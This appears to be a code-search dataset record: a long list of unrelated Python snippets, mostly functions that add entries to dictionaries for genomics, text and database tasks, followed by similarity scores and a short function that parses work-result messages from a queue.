len(info_dict[\"real_snp_localization\"])\n info_dict[\"gene_index\"] = \"intergenic\"\n\n # Check if locus is in any range\n # The enumerate function give the value of the \"value\" as well as the\n #position of the value. Example: l = [\"a\", \"b\", \"c\"]\n #enumerate (l) --- (0, \"a\"); (1, \"b\"); (2, \"c\")\n #pos - the position of the snp in the list\n #snp - is the real snp localization under analyse\n\n # Get the position of the snp in the list. This position will\n # be used to create a key for the gene_inf_dic.\n for pos, snp in enumerate(info_dict[\"real_snp_localization\"]):\n # The \"element\" is the several lists present in the gff_dic.\n #Note: all the lists regardless the type has exactly the same length.\n # Example : [10459, \"gene\", (\"18930\", \"23805\"), [\"description=LysM domain-containing protein\"]\n #So for each list we will check if the SNP is in the range\n for element in scaffold_info:\n element_beg = int(element[2][0])\n element_end = int(element[2][1])\n element_range= range(element_beg, element_end)\n\n\n # YAY, one of the SNP matches one element of the scaffold\n if snp in element_range:\n\n info_dict[\"gene_index\"] = element[0]\n\n # ELEMENT KEY:\n # \"exon\": The SNP is in a coding region\n # \"gene\": The SNP is in an intron\n # \"pseudogene\": The SNP is in a pseudogene\n info_dict[\"element_type\"][pos] = element[1]\n\n info_dict[\"element_range\"][pos] = element[2]\n\n info_dict[\"description\"] = element[3]\n\n\n\n #Get the main statistics from our dataset\n\n for locus, locus_info in sam_dic.items():\n\n element_type = locus_info[\"element_type\"]\n\n # Adding information for loci in a intergenic region\n #The set return an object with only 1 \"element\" in that case \"intergenic\"\n #So if the locus has 2 snps 1 in a intergenic region and other in a gene\n # this locus will not count as a intergenic locus, because the set will\n #have two elenets {\"intergenic\", \"gene\"} and not only 1 {\"intergenic\"}.\n #Note: The set works for each element_type present in sam_dic (loop)\n if set(element_type) == {\"intergenic\"}:\n counter_1 += 1\n\n # Adding information for SNPs in intergenic region\n #This counter gives the number of times the intergenic word appears\n counter_2 += element_type.count(\"intergenic\")\n\n # Adding information for loci in pseudogenes\n if \"pseudogene\" in element_type:\n counter_3 += 1\n\n #Adding information for SNPs in pseudogene\n counter_4 += element_type.count(\"pseudogene\")\n\n #Adding information for loci in genes\n #As previously refered the gene information were recorded in two different formats\n #gene- when the SNP were in a gene but not in a exon (aka intron)\n #exon - when the SNP were in a gene and in a specific exon\n #So in order to have the statistics for the gene we need to search\n #booth keywords on the element_type . Not in this particular case the set\n #doesn\"t work because the set don\"t has an order (gene, exon) or (exon, gene)\n\n if \"gene\" in element_type or \"exon\" in element_type:\n counter_5 += 1\n\n #Adding information for SNPs in gene\n\n counter_6 += element_type.count(\"exon\") + element_type.count(\"gene\")\n\n #Adding information for SNPs in exons\n\n counter_7 += element_type.count(\"exon\")\n\n\n\n print(\"Data resume:\")\n print(\"Number of loci in a non coding region: {}\".format(counter_1))\n print(\"Number of SNPs in a non coding region: {}\".format(counter_2))\n\n print(\"Number of loci located in pseudogenes:{}\".format(counter_3))\n print(\"Number of SNPs located in pseudogenes:{}\".format(counter_4))\n\n print(\"Number of loci located in genes: {}\".format(counter_5))\n print(\"Number of SNPs located in genes: {}\".format(counter_6))\n print(\"Number of SNPs located in exons: {}\".format(counter_7))\n\n\n\n# print(gff3_dic[6207])\n return (sam_dic, gff3_dic)", "def add_event_to_trigger_dict(event):\n\n\tconverted_event = convert_event_for_output(event)\n\n\t# Use OGLE name for key pointing to event as value if availble.\n\tif converted_event.has_key(\"name_OGLE\") and converted_event[\"name_OGLE\"] != \"\":\n\t\tlogger.info(\"Event has OGLE name\")\n\t\tname_key = \"name_OGLE\"\n\n\t# Otherwise, use the MOA name.\n\telif converted_event.has_key(\"name_MOA\") and converted_event[\"name_MOA\"] != \"\":\n\t\tlogger.info(\"Event has MOA name and no OGLE name\")\n\t\tname_key = \"name_MOA\"\n\n\t# If there is a neither a MOA nor OGLE name, something has gone wrong, and we abort storing the event.\n\telse:\n\t\tlogger.warning(\"Event has neither OGLE nor MOA name item. Event:\\n\" + str(converted_event))\n\t\tlogger.warning(\"Aborting added event to event trigger dictionary...\")\n\t\treturn\n\n\tevent_name = converted_event[name_key]\n\tglobal event_trigger_dict\n\tevent_trigger_dict[event_name] = converted_event\n\tlogger.debug(\"Added following event to event trigger dictionary: %s\" % converted_event)", "def gene(self, idx, value):\r\n self.genes[idx] = value", "def add(self, record):\n self._hist_records[record.uid] = record", "def tallying_genes():\n #Creating a tallying Mechanism of genes with multiple sequences in file and\n # an output file for future alignment of sequences \n blast_hit_results = open('blast_hits_report.txt', 'r')\n gene_dict={}\n\n for line in blast_hit_results:\n data = line.split(\"\\t\")\n \n if line.startswith('SeqID'):\n continue\n else:\n #Test to see if organism in dictionary\n verdict = gene_dict.get(data[6])\n \n if str(verdict) == \"None\":\n #creating new entry\n key = data[6]\n seq_info=str(data[0])+\"|\"+str(data[1])\n counter = 1\n #Value[Counts, Trimmed_Length, Blast Length, Blast_Score, Blast_Percent_Identity]\n value=[data[5], counter, [seq_info]]\n gene_dict.update({key:value})\n else:\n #Fills dictionary based on organism name\n seq_info=str(data[0])+\"|\"+str(data[1])\n gene_dict[data[6]][1]+=1\n gene_dict[data[6]][2].append(seq_info)\n blast_hit_results.close()\n return(gene_dict)", "def insert_file_to_dictionary():\r\n file = open(sys.argv[1], \"r\")\r\n #movies is my the dictionary\r\n movies = {}\r\n for line in file:\r\n read = line.strip().split(', ')\r\n for i in range(1, len(read)):\r\n if not read[i] in movies:\r\n movies[read[i]] = {read[0]}\r\n else:\r\n movies[read[i]].add(read[0])\r\n return movies", "def add(self, rec):\n #print(\"ADD REC={}\".format(rec))\n if self._disable_insert:\n return\n if self._is_mem:\n key = '#'.join([rec['ts'], rec['user'], rec['narr']])\n if key in self._rkeys:\n self._add_duplicate()\n self._rkeys.add(key)\n cursor = self._sq.cursor()\n rec['name'] = rec['name'][19:] # strip 'biokbase.narrative.'\n values = [rec[c] for c in self.COLUMNS]\n ivalues = []\n for v in values:\n if isinstance(v, float):\n ivalues.append('{:f}'.format(v))\n else:\n ivalues.append('\"' + v + '\"')\n stmt = self._insert_stmt.format(values=','.join(ivalues))\n # add record\n try:\n cursor.execute(stmt)\n except sqlite3.IntegrityError:\n self._add_duplicate()\n cursor.close()", "def __add_author(self, key_name, others_names, personal_information):\n for name in others_names:\n self.author_to_authorID[name] = (key_name, personal_information)", "def add_mod_interaction_links(self, gene_id):\n xref_dict = {}\n page = 'gene/MODinteractions_genetic'\n\n individual_prefix, individual_body, _ = self.etlh.rdh2.split_identifier(gene_id)\n individual_url = self.etlh.rdh2.return_url_from_identifier(gene_id, page)\n\n # Exception for MGI\n if individual_prefix == 'MGI':\n xref_dict['displayName'] = gene_id\n xref_dict['id'] = gene_id\n xref_dict['globalCrossRefId'] = gene_id\n xref_dict['primaryKey'] = gene_id + page\n else:\n xref_dict['displayName'] = individual_body\n xref_dict['id'] = individual_body\n xref_dict['globalCrossRefId'] = individual_body\n xref_dict['primaryKey'] = individual_body + page\n\n xref_dict['prefix'] = individual_prefix\n xref_dict['localId'] = individual_body\n xref_dict['crossRefCompleteUrl'] = individual_url\n xref_dict['uuid'] = str(uuid.uuid4())\n xref_dict['crossRefType'] = page\n xref_dict['page'] = page\n xref_dict['reference_uuid'] = str(uuid.uuid4())\n\n# For matching to the gene when creating the xref relationship in Neo.\n xref_dict['dataId'] = gene_id\n # Add the gene_id of the identifier to a global list so we don't create unnecessary xrefs.\n self.successful_mod_interaction_xrefs.append(gene_id)\n\n return xref_dict", "def add_tag (self,tag,key):\r\n\r\n #with shelf\r\n\r\n if self.using_shelf:\r\n\r\n if tag in self.tag_dict:\r\n\r\n self.tag_dict[tag].add(key)\r\n\r\n else:\r\n\r\n self.tag_dict[tag] = {key}\r\n\r\n #with database\r\n\r\n if self.using_database:\r\n\r\n value_tuple = (notebookname, tag, key,)\r\n db_cursor.execute(\"INSERT OR REPLACE \"\r\n +\"INTO tags_to_keys \"\r\n +\"(notebook, tag, keyword) \"\r\n +\"VALUES (?,?,?);\",value_tuple)", "def addtagDic(dic_i,tag,tag_str,setint=False):\n if( len( tag_str ) ):\n dic_i[tag] = []\n for id_s in tag_str.split():\n if( setint ):\n dic_i[tag].append(int(id_s))\n else:\n dic_i[tag].append(id_s)\n \n return dic_i", "def addtagDic(dic_i,tag,tag_str,setint=False):\n if( len( tag_str ) ):\n dic_i[tag] = []\n for id_s in tag_str.split():\n if( setint ):\n dic_i[tag].append(int(id_s))\n else:\n dic_i[tag].append(id_s)\n \n return dic_i", "def add(self, key, value):\n if not key in self:\n self.keys.append(key)\n self.dict[key] = value", "def add_IFD(metadata: dict, ifd: str) -> dict:\n if ifd not in metadata:\n metadata.update({ifd: {}})\n\n return metadata", "def _add_bridge_db_identifiers(map_dict) -> dict:\n sys.stdout.write(\"Adding BridgeDB identifiers...\\n\")\n r_session = base_utils.requests_retry_session()\n\n for uniq_id in tqdm.tqdm(map_dict, total=len(map_dict)):\n parts = uniq_id.split(':')\n db = parts[0]\n uid = parts[-1]\n\n if db in constants.BRIDGEDB_MAP:\n # list of other DBs to query from\n q_dbs = constants.BRIDGEDB_MAP[db]\n for q_db in q_dbs:\n try:\n r = r_session.get(\n 'http://webservice.bridgedb.org/Human/xrefs/{}/{}?dataSource={}'.format(\n constants.BRIDGEDB_KEYS[db],\n uid,\n constants.BRIDGEDB_KEYS[q_db]\n )\n )\n except Exception as x:\n print(\"%s: %s\" % (uniq_id, x.__class__.__name__))\n continue\n\n result = r.text\n if len(result) > 0:\n add_ids = [line.split('\\t')[0] for line in result.split('\\n')[:-1]]\n new_ids = ['{}:{}'.format(q_db, i) for i in add_ids if i.isalnum()]\n for n_id in new_ids:\n new_id = '{}:{}'.format(q_db, n_id)\n map_dict[uniq_id].add(new_id)\n\n time.sleep(0.5)\n\n return map_dict", "def add(self, key, val, comment='') :\n \n # add lines:\n self.outfile.append('\\n')\n if len(comment) > 0 : self.outfile.append('! %s\\n' % comment)\n self.outfile.append('%s : %s\\n' % (key, str(val)))\n\n # add to dictionairy:\n self.values[key] = val\n \n # ok\n return", "def create_ner_tags_dict():\r\n global ne_tags_set, ner_to_id, ne_tags, id_to_ner\r\n\r\n ne_tags = list(ne_tags_set) + ['[CLS]', '[SEP]']\r\n ne_tags.sort()\r\n id_to_ner = {idx: tag for idx, tag in enumerate(ne_tags)}\r\n ner_to_id = {tag: idx for idx, tag in enumerate(ne_tags)}\r\n print(f'Total NER tag size: {len(ne_tags)}; Tags: {ne_tags}')", "async def add_dict(self, dic):\n for key in dic:\n await self.set(key, dic[key])", "def add_gene_ids(self, genes_list):\n orig_num_genes = len(self.genes)\n\n for g in list(set(genes_list)):\n if not self.genes.has_id(g):\n new_gene = GenePro(id=g, pdb_file_type=self.pdb_file_type, root_dir=self.genes_dir)\n if self.model:\n self.model.genes.append(new_gene)\n else:\n self.genes.append(new_gene)\n\n log.info('Added {} genes to GEM-PRO project'.format(len(self.genes)-orig_num_genes))", "def add_taxonomy(tax_idx, pkl):\n for tax,v in tax_idx.items():\n for genome_id,genome_len in v.items():\n T = '|'.join(list(tax) + ['t__' + genome_id])\n pkl['taxonomy'][T] = ('', int(genome_len))\n return pkl", "def addInfo(label: str, value: str):\r\n\r\n if not self.isClosed:\r\n if label not in self.__identity_info.keys():\r\n self.__identity_info[label] = value\r\n else:\r\n raise HDDOPermissionException('Tried to add existing identity information twice to a HealthDominoDataObject.')\r\n else:\r\n raise HDDOPermissionException('Tried to add identity information to a closed HealthDominoDataObject.')", "def add_node(self, node):\n try:\n self.dict.setdefault(node, OrderedDict())\n except (AttributeError, TypeError):\n raise \"Node Value must be hashable value\"", "def record(self, record_meta: Dict[str, Set[str]]):\n if \"ft.onto.base_ontology.Phrase\" not in record_meta.keys():\n record_meta[\"ft.onto.base_ontology.Phrase\"] = set()", "def add_item(dct,item):\r\n if item not in dct[0]:\r\n print \"itemNotFound \",str(item)\r\n return False\r\n\r\n num=len(item)\r\n if num in dct:\r\n if item in dct[num]:\r\n return False\r\n else:\r\n dct[num].append(item)\r\n return True\r\n else:\r\n dct[num]=[item]\r\n return True", "def dictagnum(kind, fname):\n\n with open(fname, 'r') as g:\n g.next()\n g.next()\n m = g.next()\n startdict = agline(m)\n genold = startdict['gen']\n\n f = open(fname)\n f.next()\n f.next()\n d = {}\n y = '1'\n nb = []\n for l in f:\n adict = agline(l)\n ks = kind + 's'\n gen = adict['gen']\n well = adict['well']\n\n if adict['gen'] not in d:\n d[gen] = []\n \n if gen != genold:\n d[genold].append(sum(nb))\n nb = []\n else: \n if adict['well'] != y:\n d[gen].append(sum(nb))\n nb = []\n \n if kind == 'charge':\n if adict[ks] == 'x':\n nb.append(0)\n elif int(adict[ks]) >= 0 and (adict['charget'] == 'c' or \n adict['charget'] == 'o'):\n nb.append(1)\n elif adict[ks] == '-':\n pass\n #print('nb', nb)\n\n if kind == 'escd' or kind == 'escm':\n if adict[ks] == '':\n nb.append(0)\n elif int(adict[ks]) >= 0:\n nb.append(1)\n elif adict[ks] == '-':\n pass\n\n y = adict['well']\n genold = adict['gen']\n \n d[gen].append(sum(nb))\n \n return(d)", "def insert(self, word):\r\n t = self.trie\r\n \r\n for w in word: \r\n if w not in t: \r\n t[w] = {}\r\n t = t[w]\r\n t['#'] = True\r\n print(self.trie)", "def build_doid_omim_dict(obo_file):\n obo_fh = open(obo_file, 'r')\n doid_omim_dict = {}\n\n # This statement builds a list of the lines in the file and reverses\n # its order. This is because the list 'pop()' method pops out list\n # elements starting from the end. This way the lines will be read in\n # the following loop in order, from top to bottom of the file.\n obo_reversed_str_array = obo_fh.readlines()[::-1]\n\n while obo_reversed_str_array: # Loop adapted from Dima @ Princeton\n line = obo_reversed_str_array.pop()\n line = line.strip()\n if line == '[Term]':\n while line != '' and obo_reversed_str_array:\n line = obo_reversed_str_array.pop()\n\n if line.startswith('id:'):\n doid = re.search('DOID:[0-9]+', line)\n if doid:\n doid = doid.group(0)\n\n if line.startswith('xref: OMIM:'):\n # If term has OMIM xref, get it and add it to the\n # doid_omim_dict. Otherwise, ignore.\n omim = re.search('[0-9]+', line).group(0)\n\n if doid not in doid_omim_dict:\n doid_omim_dict[doid] = set()\n if omim not in doid_omim_dict[doid]:\n doid_omim_dict[doid].add(omim)\n\n return doid_omim_dict", "def add_to_dict(param_dict):\n ### Sample - Int\n sample_s = param_dict['ml_args'].sample_s\n ### Sample - Mr\n sample_Mr = param_dict['ml_args'].sample_Mr\n ## Sample volume\n # Units (Mpc/h)**3\n volume_sample = { '18': 37820 / 0.01396,\n '19': 6046016.60311 ,\n '20': 2.40481e7 ,\n '21': 8.79151e7 }\n vol_mr = volume_sample[sample_s]\n ##\n ## Choice of Centrals and Satellites\n cens = int(1)\n sats = int(0)\n ## Other constants\n # Speed of light - In km/s\n speed_c = ac.c.to(u.km/u.s).value\n ## Number of CPU's to use\n cpu_number = int(cpu_count() * param_dict['cpu_frac'])\n ##\n ## Plotting constants\n plot_dict = { 'size_label':23,\n 'size_title':25,\n 'color_ham' :'red',\n 'color_dyn' :'blue'}\n ##\n ## Catalogue Prefix string\n catl_str_fig = param_dict['ml_args'].catl_alg_comp_fig_str()\n ##\n ## Saving to `param_dict`\n param_dict['sample_s' ] = sample_s\n param_dict['sample_Mr' ] = sample_Mr\n param_dict['vol_mr' ] = vol_mr\n param_dict['cens' ] = cens\n param_dict['sats' ] = sats\n param_dict['speed_c' ] = speed_c\n param_dict['cpu_number' ] = cpu_number\n param_dict['plot_dict' ] = plot_dict\n param_dict['catl_str_fig'] = catl_str_fig\n\n return param_dict", "def add_a_record(self, record):\n '''\n doc = { \"P/N\": record,#record.get_PN(),\n \"supplier\": \"\",\n \"inventory\": \"\",\n \"specification\": \"\",\n \"description\": \"\",\n \"OEM\": \"\",\n \"tags\": [\"mongodb\", \"python\", \"pymongo\"],\n \"date\": datetime.datetime.utcnow()}'''\n self.collection.insert(record)", "def addToExtra(self,key,val):\n if self.extra == None: \n self.extra = {} \n self.extra[key] = val", "def newPhraseInfo(phrase):\n return {\"count\":0,\n \"ids\":set(),\n \"phrase\":phrase\n }", "def add_friend(individual, friend, friend_dict):\n\n #if the individual is not yet added to the friend_dict\n if individual not in friend_dict:\n friend_dict[individual] = set()\n\n # add the individual set of immediate friends of 'individual'\n # using a set, so there are no duplicate names \n friend_dict[individual].add(friend)", "def add(self, obj, match_dict):\r\n for match_key in match_dict.keys():\r\n assert match_key in self.keys_to_track\r\n\r\n for key_to_track in self.keys_to_track:\r\n if match_dict.has_key(key_to_track):\r\n match_val = match_dict[key_to_track]\r\n if match_val is None or match_val == '':\r\n pass\r\n else:\r\n self.tracker[key_to_track][match_val] = obj", "def append(self, CID, client, rat):\n global masterDict\n try:\n masterDict.update(self.genCase(CID, client, rat))\n return (1) # append sucessful\n except Exception:\n return (0) # error occured, handle in calling method", "def add_key_value(self, key, value):\n key = self._metadata_map().get(key, key)\n if key in ['dateAdded', 'lastModified']:\n self._data[key] = self.util.any_to_datetime(value).strftime('%Y-%m-%dT%H:%M:%SZ')\n elif key == 'confidence':\n self._data[key] = int(value)\n elif key == 'rating':\n self._data[key] = float(value)\n elif key == 'unique_id':\n self._unique_id = quote(self.fully_decode_uri(value), safe='')\n else:\n self._data[key] = value", "def add_to_dict ( self, key_0, key_1, list_2 ):\n\n old_value_0 = self._dd_dict.get( key_0 ) # value for key 0\n if old_value_0 is None:\n self._dd_dict[ key_0 ] = { key_1: list_2 }\n else:\n # need to merge a value into old_value_0 which is a dict in the self....\n old_value_0[ key_1 ] = list_2\n\n self.print_dd_dict()\n\n\n print( self._dd_dict )\n # could return but it is a mutate\n return", "def entrez_gene_id(self, entrez_gene_id: int):\n\n self._entrez_gene_id = entrez_gene_id", "def _stream_dict_add(sb, n, i=None):\n if i is None:\n key = n\n else:\n key = \"{}[{}]\".format(n, i)\n stream_dict[key] = sb", "def _add_record(days_dict, record, key):\n days_dict[key] = {\n \"Name\": record[\"title\"],\n \"Owner\": record[\"owner\"],\n \"Severity\": record[\"severity\"],\n \"Created\": (time.strftime(SIRPPipeline.TIME_FMT, time.gmtime(record[\"createdAt\"] / 1000.0))),\n }\n if \"endDate\" in record:\n days_dict[key].update(\n {\n \"Closed\": (time.strftime(SIRPPipeline.TIME_FMT, time.gmtime(record[\"endDate\"] / 1000.0),)),\n \"Resolution\": record[\"resolutionStatus\"],\n }\n )", "def add(self, obj):\n ID = id(obj)\n self.pDict[ID] = obj\n return ID", "def insert(self, word):\n level = self.trie\n for c in word:\n if c in level:\n level = level[c]\n else:\n level[c] = {}\n level = level[c]\n level[self.end] = 1", "def __setitem__(self, key, value):\n Identifier.checkIdentifier(key)\n self.graph.saveExtendedAttributes(self.entityId, {key: value})", "def add_unique(word, unique_words, unique):\n\tunique_words[word]=unique", "def add_entry(self, entry):\n if self.get_entry(entry):\n return entry\n\n keys, values = [], []\n for i in entry:\n keys.append(\"'{}'\".format(i))\n if not isinstance(entry[i], str):\n values.append(\"'{}'\".format(str(entry[i])))\n else:\n values.append(\"'{}'\".format(entry[i]))\n\n keys.append(\"'hash'\")\n values.append(\"'{}'\".format(self._calculate_hash(entry)))\n sql = 'INSERT INTO {t_id} ({keys}) VALUES ({values})'.format(\n t_id=self.table_id, keys=','.join(keys), values=','.join(values))\n self.fusiontables.query().sql(sql=sql).execute()", "def _gen_id(event):\n eid = np.sort(np.unique(event))\n iid = {}\n for i in xrange(len(eid)):\n iid[eid[i]] = i\n return len(eid), eid, iid", "def add_entry_to_bibtex_db(self, ent):\n\n # add additional fields manually to the dict\n ent.consolidate_dict()\n self.bibtex_db.entries.append(ent.raw_dict)\n # the following updates the entries dict\n # self.bibtex_db.get_entry_dict()\n # # make sure it's there\n # if ent.ID not in self.bibtex_db.entries_dict:\n # self.bibtex_db.entries_dict[ent.ID] = ent.raw_dict", "def insert(self, word: str):\n tree = self.lookup\n for a in word:\n if a not in tree:\n tree[a] = {}\n tree = tree[a]\n # 单词结束标志\n tree[\"#\"] = \"#\"", "def __add_to_word_dict__(self, word, tag):\n if self.word_dict.get(word, None) is None:\n self.word_dict[word] = defaultdict(int)\n self.word_dict[word][tag] += 1", "def add_genesets(snp_dict,gene_file):\n inf = open(gene_file,\"r\")\n for i in snp_dict.keys():\n snp_dict[i]['genes']=np.empty(len(snp_dict[i]['bps']), dtype=set)\n for line in inf:\n if re.match(\"\\#\",line):\n continue\n line.rstrip()\n fields=line.split()\n if len(fields) < 3:\n continue\n bps=int(fields[1])\n if fields[0] in snp_dict.keys():\n idx = snp_dict[fields[0]]['bps'].searchsorted(bps)\n if (idx < len(snp_dict[fields[0]]['bps'])) and snp_dict[fields[0]]['bps'][idx] == bps:\n snp_dict[fields[0]]['genes'][idx]=set([ x for x in fields[2:] ])\n return True", "def insert(self, key, val):\n self.dict.setdefault(key, []).append(val)", "def add_record(self, record: Dict, src_name: SourceName) -> None:\n concept_id = record[\"concept_id\"]\n record[\"src_name\"] = src_name.value\n label_and_type = f\"{concept_id.lower()}##identity\"\n record[\"label_and_type\"] = label_and_type\n record[\"item_type\"] = \"identity\"\n try:\n self.batch.put_item(Item=record)\n except ClientError as e:\n logger.error(\n \"boto3 client error on add_record for \"\n f\"{concept_id}: {e.response['Error']['Message']}\"\n )\n for attr_type, item_type in ITEM_TYPES.items():\n if attr_type in record:\n value = record.get(attr_type)\n if not value:\n continue\n if isinstance(value, str):\n items = [value.lower()]\n else:\n items = {item.lower() for item in value}\n for item in items:\n self._add_ref_record(\n item, record[\"concept_id\"], item_type, src_name\n )", "def update_utr_info(ensembl_info, word, value):\n if \"utr\" in word:\n if \"start\" in word:\n if \"5\" in word:\n ensembl_info[\"utr_5_start\"] = int(value)\n elif \"3\" in word:\n ensembl_info[\"utr_3_start\"] = int(value)\n elif \"end\" in word:\n if \"5\" in word:\n ensembl_info[\"utr_5_end\"] = int(value)\n elif \"3\" in word:\n ensembl_info[\"utr_3_end\"] = int(value)\n return ensembl_info", "def add_node(self, n):\n self.node_dict.setdefault(n, OrderedDict())", "def store_g(self, gui_id, key, a):\n if gui_id in self.SMGData.keys():\n if key in self.SMGData[gui_id].keys():\n self.SMGData[gui_id][key] = a\n else:\n raise Exception('Key is gui_id does not exist in the data structure')\n else:\n raise Exception('Gui id does not exist in the data structure')", "def _insert_in_metadata_fits_safe(self, key, value):\n from .core import _short_names\n\n if key in _short_names and isinstance(self.meta, fits.Header):\n # This keyword was (hopefully) added by autologging but the\n # combination of it and its value not FITS-compliant in two\n # ways: the keyword name may be more than 8 characters and\n # the value may be too long. FITS cannot handle both of\n # those problems at once, so this fixes one of those\n # problems...\n # Shorten, sort of...\n short_name = _short_names[key]\n self.meta['HIERARCH {0}'.format(key.upper())] = (\n short_name, \"Shortened name for ccdproc command\")\n self.meta[short_name] = value\n else:\n self.meta[key] = value", "def add_dupemap(self, tag, dupesuf='_1',verbose=False):\n if (self.dupesuf != False and self.dupesuf != dupesuf): #suffix to add for duplicate rec_glm tags\n print 'Duplicate map already created with dupe_suf \"{0}\" - cannot change dupesuf to {1}'.format(self.dupesuf,dupesuf)\n else: self.dupesuf = dupesuf\n\n oldtag = tag\n if oldtag not in self.bintaglist:\n raise KeyError(\"Error! {0} not in taglist - don't know which map to duplicate.\")\n while tag in self.bintaglist:\n tag += self.dupesuf\n if verbose:print 'Duplicating {0}: naming new bintag \"{1}\"'.format(oldtag,tag)\n newNmap=self.Nmap+1\n newNcross=newNmap*(newNmap+1)/2\n oldmapind=self.tagdict[oldtag]\n newmapind= newNmap-1 #put new map at end\n new_nbar = self.nbar[oldmapind]\n newcl=np.zeros((newNcross,self.Nell))\n #delxinds=self.crossinds[oldmapind,:]\n ##newdocross=np.setdiff1d(self.docross,delxinds)#unique elements of docross not in delxinds\n \n #this isn't really necessary for adding a map since we're keeping all the old Cl, but keeping to minimize changes from original deletemap method\n\n#NOPE, BELOW IS WRONG, NOT ORDERED THAT WAY -- AUTOPOWERS ARE FIRST, PER THE \"NEW\" ORDERING IN HEALPY.SYNALM\n#http://healpy.readthedocs.io/en/latest/generated/healpy.sphtfunc.synalm.html\n#assuming the order goes as I think it does... first entries will all agree, then just duplicate last row, and again duplicate last element\n# so cl[newNmap,newNmap] == cl[newNmap-1,newNmap] == cl[newNmap-1, newNmap-1], and cl[newNmap,:] = cl[newNmap-1,:]\n\n newcrosspairs,newcrossinds = get_index_pairs(newNmap)\n newdox = []\n# print \"newNmap:\",newNmap\n for w in xrange(newNmap):\n for v in xrange(newNmap): \n if v<= w: #symmetric matrix\n xind_new = newcrossinds[w,v]\n if w < self.Nmap: #not looking at any pairs involving new map\n xind_old=self.crossinds[w,v]\n# tag1 = bintaglist[w]\n# tag2 = bintaglist[v]\n elif v<self.Nmap: # know w==self.Nmap. use the old xind from the original map for the new Cl[xind] of the duplicate map\n xind_old=self.crossinds[oldmapind,v]\n# print \"map1={0}, map2={1},xind_old={2},xind_new={3}\".format(w,v,xind_old,xind_new)\n else: #both v,w == self.Nmap\n xind_old=self.crossinds[oldmapind,oldmapind]\n# print \"Map1={0}, map2={1},xind_old={2},xind_new={3}\".format(w,v,xind_old,xind_new)\n newcl[xind_new, :] = self.cl[xind_old,:]\n newdox.append(xind_new) #new cross correlations we've calc'd\n# print xind_new\n #set up new values\n self.docross.extend(newdox) #indicate we've calculated the cross correlations\n self.Nmap=newNmap\n self.bintaglist.append(tag)\n self.tagdict={self.bintaglist[m]:m for m in xrange(self.Nmap)}\n self.Ncross=newNcross\n self.crosspairs=newcrosspairs #[crossind,mapinds] (NCross x2)\n self.crossinds=newcrossinds #[mapind,mapind] (Nmap x Nmap)\n #THIS IS A TEMPORARY HACK\n self.pairs=consolidate_dotags(['all'],self.bintaglist) #IS THIS STILL LEGITIMATE GIVEN THE \"HACK\" COMMENT ABOVE? [NJW 160627]\n #self.docross=['all'] \n #self.pairs=get_pairs_fromcrossind(self.bintaglist,newdocross,self.crosspairs,self.crossinds)\n self.cl=newcl\n self.nbar=np.append(self.nbar,new_nbar)\n #just set up noisecl again\n self.noisecl = np.zeros((self.Ncross,self.Nell)) \n for i in xrange(self.Nmap):\n if self.nbar[i]!=-1: #assumes -1 for no noise or isw\n diagind=self.crossinds[i,i]\n self.noisecl[diagind,:]=1/self.nbar[i]\n self.noisecl[diagind,0]=0\n return (self,tag) #return the new (now uniqe) tag", "def concatenate_record(record):\n new_record = {}\n for k,v in record.items():\n if k in ['AB','FX','PA','TI','RP','ID']:\n new_v = ' '.join(v)\n \n if k == 'ID':\n new_v = new_v.split('; ')\n \n new_record[k] = new_v\n elif k == 'CR':\n previous_citation = ''\n new_citations = []\n for citation in v:\n if previous_citation.endswith('DOI'):\n new_citations[-1] += ' ' + citation\n previous_citation = new_citations[-1]\n else :\n new_citations.append(citation)\n previous_citation = citation\n \n new_record[k] = new_citations\n else :\n new_record[k] = v\n \n return new_record", "def mel_gene_set(dict): # this uses the flanking genes, specifically\n\tmel_gene_set = set()\n\tfor k, v in dict.iteritems():\n\t\t#v[0] is up, v[1] is down\n\t\t#print \"this is v:\", v\n\t\tfor mg in v[0]:\n\t\t\tmel_gene_set.add(mg)\n\t\tfor mg in v[1]:\n\t\t\tmel_gene_set.add(mg)\n\treturn mel_gene_set", "def add_genre(self, gid: str, gen: str):\n if self.sess.query(exists().where(Genre.genre_id == gid or Genre.genre == gen)).scalar():\n return\n self.logging.info(f\"adding genre: {gen} with id {gid}\")\n genre = Genre(gid=uuid4().hex,\n genre_id=gid,\n genre=gen)\n self.sess.add(genre)\n self.sess.commit()", "def test_set_gene_from_info(self):\n \n # check for when a HGNC key exists\n self.var.info[\"HGNC\"] = \"A\"\n self.var.set_gene_from_info()\n self.assertEqual(self.var.gene, \"A\")\n \n # check for when a HGNC key doesn't exist\n del self.var.info[\"HGNC\"]\n self.var.set_gene_from_info()\n self.assertIsNone(self.var.gene)", "def _populate_oid_attid(self):\n self.hash_oid_name = {}\n res = self.search(expression=\"objectClass=attributeSchema\",\n controls=[\"search_options:1:2\"],\n attrs=[\"attributeID\",\n \"lDAPDisplayName\"])\n if len(res) > 0:\n for e in res:\n strDisplay = str(e.get(\"lDAPDisplayName\"))\n self.hash_oid_name[str(e.get(\"attributeID\"))] = strDisplay", "def add(self, key, value):\n self.data.append((key, value))" ]
[ "0.65119916", "0.5768898", "0.5745668", "0.5678076", "0.56137764", "0.5577298", "0.5574873", "0.5562769", "0.55310345", "0.54852855", "0.5448665", "0.5448038", "0.5416714", "0.54129606", "0.54046834", "0.539394", "0.5387726", "0.53722453", "0.5369394", "0.53620994", "0.5358258", "0.53442824", "0.5333245", "0.5328457", "0.53133875", "0.5296068", "0.5284008", "0.52584064", "0.5251175", "0.5251093", "0.52380687", "0.523567", "0.5233893", "0.5233436", "0.5209643", "0.52081347", "0.5193213", "0.5190308", "0.5184879", "0.51578313", "0.5153704", "0.5151389", "0.5112146", "0.5111857", "0.5097014", "0.50854635", "0.5084874", "0.50845903", "0.5082367", "0.5082367", "0.506765", "0.5063917", "0.5063795", "0.505174", "0.50516933", "0.5051672", "0.5050723", "0.50505346", "0.504835", "0.5044839", "0.50383246", "0.50382197", "0.5029612", "0.5027254", "0.50264555", "0.501327", "0.5012686", "0.5002887", "0.4996906", "0.49917302", "0.49884984", "0.4983959", "0.49817273", "0.4981304", "0.49790376", "0.49767467", "0.49766758", "0.49706098", "0.49697435", "0.49659857", "0.49638325", "0.4960188", "0.49555328", "0.4950401", "0.49479842", "0.4946049", "0.49400857", "0.49297115", "0.49290708", "0.4923409", "0.49217814", "0.4918983", "0.49173176", "0.49166578", "0.49165955", "0.4913672", "0.49134877", "0.49104235", "0.49097788", "0.4893453" ]
0.7082176
0
for handling WorkResultMessages from Result queue
def extractWorkResultMessage(messageBody): messageContents = json.loads(messageBody) try: message = WorkResultMessage(body=messageContents) return message except: log.error(str(sys.exc_info()[0]))
